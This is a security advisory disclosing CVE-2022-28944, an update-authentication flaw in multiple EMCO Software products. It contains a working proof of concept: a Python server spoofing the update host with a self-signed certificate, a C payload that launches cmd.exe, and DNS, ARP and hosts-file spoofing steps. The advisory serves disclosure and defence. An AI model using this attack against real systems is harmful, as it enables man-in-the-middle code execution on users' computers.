EMCO Software Multiple Products Unauthenticated Update Remote Code Execution Vulnerability (PDF)

Advisory Information

  • Title: EMCO Software Multiple Products Unauthenticated Update Remote Code Execution Vulnerability
  • Vendors contacted: EMCO Software
  • Release mode: Public Release

Vulnerability Information

Affected Products

  • EMCO MSI Package Builder for Windows 9.1.4 (uses HTTP)
  • EMCO Remote Installer for Windows 6.0.13
  • EMCO Ping Monitor for Windows 8.0.18
  • EMCO Remote Shutdown for Windows 7.2.2
  • EMCO WakeOnLan Free 2.0.8
  • EMCO WakeOnLan Professional 2.0.8
  • EMCO Network Inventory for Windows 5.8.22 (different configuration)
  • EMCO Network Software Scanner for Windows 2.0.8
  • EMCO UnLock IT for Windows 6.1.1 (uses HTTP)

High-level overview

This vulnerability allows remote attackers to execute arbitrary code on the affected installations of EMCO Software. A man-in-the-middle position is required to exploit this vulnerability.

The specific flaw exists in the Live Update Wizard and Major Update Wizard in the affected installations of EMCO Software, which insufficiently authenticates its update server. An attacker can spoof the update server and leverage this vulnerability to execute code in the context of the current user.

Root Cause Analysis

The vulnerability is caused by the Live Update Wizard and Major Update Wizard in the affected installations of EMCO Software.

By default, the update check is executed automatically daily and manually through the application menu.

The update first requests the MajorUpdate.xml configuration (or MajorUpdateProfessional.xml/MajorUpdateFree.xml) before requesting the Update.xml configuration (or UpdateProfessional.xml/UpdateFree.xml) from storage.emcosoftware.com over HTTP or HTTPS. When HTTP is used, attackers can modify code in transit. When HTTPS is used, insecure certificates are ignored by the affected installations, allowing attackers to use self-signed certificates to modify code in transit.

An example of the Update.xml configuration is given below (in this case EMCO MSI Package Builder for Windows 9.1.1).

<ROOT>
	<UPDATEENTRY>
		<VERSION>9.1.1.1527</VERSION>
		<CHANGE>
			<TYPE>NewFeature</TYPE>
			<COMMENT>Added Windows 11 support.</COMMENT>
		</CHANGE>
<!-- snipped -->
	</UPDATEENTRY>
<!-- snipped -->	
	<SETUP>/download/msipackagebuilder/MSIPackageBuilderSetup.exe</SETUP>
</ROOT>

If the version specified in <VERSION> is higher than the version of the installed software, the user is presented with the Live Update Wizard indicating that a new update is available. When accepting the update, the update binary is requested from http(s):\\storage.emcosoftware.com\<SETUP> and automatically executed. Similar behaviour is seen with the Major Update Wizard.

Note that for EMCO Network Inventory for Windows 5.8.22 different configurations are requested, namely ent_5.inf and networkinventory5xent.inf which is shown below. Here, if the version is higher than the installed version, the URLs are requested and replaced with the existing - equally named - ones.

#message={Version 5.8.22.10109 is available.

Resolved Issues:
* A BIOS serial is not completely visible after a scan.
* Unable to specify a registry custom scanning criteria with a comma in a registry key or value.
*
* For more details see
* http://emcosoftware.com/network-inventory/whats-new
}

#url1=http://storage.emcosoftware.com/autoupdate/networkinventory/v5/NetworkInventoryEnt.exe
--SNIPPED--

#redirect=no

#version=48

Proof-of-Concept

The below script is used as a proof of concept for the Live Update Wizard, a similar approach can be used for the Major Update Wizard (change the majorupdate_xml variable). For affected products that request an update over HTTP, skip the ssl.wrap_socket() call and change the port to 80.

#!/usr/bin/env python3
# Proof-of-concept script for EMCO Software Multiple Products Unauthenticated Update Remote Code Execution Vulnerability
# See report for details.
#
# Generate self-signed certificate e.g. using:
# > openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"
#
# Author: Gerr.re
from http.server import BaseHTTPRequestHandler, HTTPServer
import ssl

majorupdate_xml = b'''<ROOT>
  <UPDATEENTRY>
    <VERSION>0.0.0.0</VERSION>
  </UPDATEENTRY>
</ROOT>'''

update_xml = b'''<ROOT>
	<UPDATEENTRY>
		<VERSION>99.9.9.9999</VERSION>
		<CHANGE>
			<TYPE>BugFix</TYPE>
			<COMMENT>We recommend the updater using TLS/HTTPS for requests and dropping request for which the TLS certificate is untrusted.</COMMENT>
		</CHANGE>
        <CHANGE>
			<TYPE>BugFix</TYPE>
			<COMMENT>We recommend checking the signature of the update binary.</COMMENT>
		</CHANGE>
	</UPDATEENTRY>
	<SETUP>/proof.exe</SETUP>
</ROOT>'''

class HTTPHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if "proof.exe" in self.path:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(open("proof.exe", "rb").read())
        elif "/MajorUpdate" in self.path:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(majorupdate_xml)
        elif "/Update" in self.path:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(update_xml)
        else:
            self.send_response(404)
            self.end_headers()

if __name__ == "__main__":
    print("Running Server")

    try:
        httpd = HTTPServer(("0.0.0.0", 443), HTTPHandler)
        httpd.socket = ssl.wrap_socket(httpd.socket,
                                server_side=True,
                                certfile='storage.emcosoftware.com.pem',
                                ssl_version=ssl.PROTOCOL_TLS)
        httpd.serve_forever()
    except KeyboardInterrupt:
        httpd.server_close()

Testsetup

This proof-of-concept was tested on target Windows 10 21H2 with abovementioned affected products of EMCO Software installed, and attacker Ubuntu 20.04.3 LTS.

Steps to reproduce

  1. Install an affected product of EMCO Software;
  2. Set spoof storage.emcosoftware.com to our attacker ip;
    • For a proof-of-concept edit c:\windows\system32\drivers\etc\hosts on target.
      • Note: attackers may e.g. use:
        • poorly configured routers/switches/DNS,
        • DNS spoof / cache poisoning,
        • ARP spoof / cache poisoning.
  3. Compile proof.c on the attacker, e.g. using i686-w64-mingw32-gcc proof.c -o proof.exe;
#include <windows.h>
int main(int argc, char const *argv[]){	
	WinExec("cmd.exe",1);
	return TRUE;
}
  1. Generate self-signed certificates;
    • e.g. using openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"
  2. Run the proof-of-concept script;
  3. Start the affected product of EMCO Software and either
    • wait a day to trigger update automatically, or
    • trigger the update manually through the application menu;
  4. Accept the update in the Update Wizard.
    • Attackers will use a persuasive update description to convince a target to accept the update.

As a result, proof.exe is requested and executed in the context of the current user.

<code>proof.exe</code> is executed in the context of the current user

Recommendations

The vulnerability presents itself because there is insufficient authentication from the update server.

We recommend EMCO Software to release a fix to the issue:

  • the updaters using TLS/HTTPS for requests and dropping request for which the TLS certificate is untrusted;
  • the updaters must check the signature of the update binary.

We recommend users to sinkhole the storage.emcosoftware.com domain until a fix is available:

  1. Open c:\windows\system32\drivers\etc\hosts in a text editor with Administrator privileges.
  2. Add the following line at the end of the file:
0.0.0.0  storage.emcosoftware.com

Report Timeline

  • 18-02-2022: Initial contact with the vendor through the Technical Support Request Form.
  • 18-02-2022: EMCO automatically assigns ticket #35728518.
  • 04-03-2022: Gerr.re send reminder to support@emcosoftware.com after no response.
  • 24-03-2022: EMCO releases MSI Package Builder for Windows 9.1.4 which is also vulnerable.
  • 06-04-2022: Gerr.re send final reminder through the Technical Support Request Form after no response.
  • 06-04-2022: EMCO automatically assigns ticket #39750775.
  • 06-04-2022: Gerr.re sent a request to Mitre for a CVE ID.
  • 28-04-2022: Mitre assigns CVE-2022-28944.
  • 10-05-2022: Public release due to no response from EMCO.

Disclaimer

The contents of this advisory are copyright © 2022 Gerr.re, and are licensed under a Creative Commons Attribution-NoDerivatives 4.0 International (CC BY-ND 4.0)